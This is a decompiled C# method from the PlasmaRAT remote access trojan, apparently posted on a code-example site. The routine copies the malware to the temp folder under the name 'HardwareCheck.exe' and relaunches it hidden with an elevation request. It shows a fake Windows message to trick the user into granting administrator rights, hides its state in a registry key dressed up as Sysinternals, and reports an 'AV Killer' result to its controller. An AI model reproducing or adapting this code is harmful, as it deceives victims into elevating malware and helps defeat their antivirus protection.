Ejemplo n.º 1
0
 // Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78
 public static void RunAVAdminMode()
 {
     try
     {
         string text = Path.GetTempPath() + "HardwareCheck.exe";
         if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0)
         {
             if (!File.Exists(text))
             {
                 File.Copy(Application.ExecutablePath, text);
             }
             ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[]
             {
                 "/c ",
                 text,
                 "\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ",
                 Environment.UserName.ToString().ToString(),
                 "\r\nProcessor Count: ",
                 Environment.ProcessorCount.ToString(),
                 "\r\nOperating System: ",
                 MyProject.Computer.Info.OSFullName
             }));
             processStartInfo.WindowStyle      = ProcessWindowStyle.Hidden;
             processStartInfo.UseShellExecute  = true;
             processStartInfo.WorkingDirectory = Environment.CurrentDirectory;
             processStartInfo.Verb             = "runas";
             try
             {
                 Process.Start(processStartInfo);
                 Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran");
                 PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty);
             }
             catch (Exception ex)
             {
             }
         }
     }
     catch (Exception ex2)
     {
     }
 }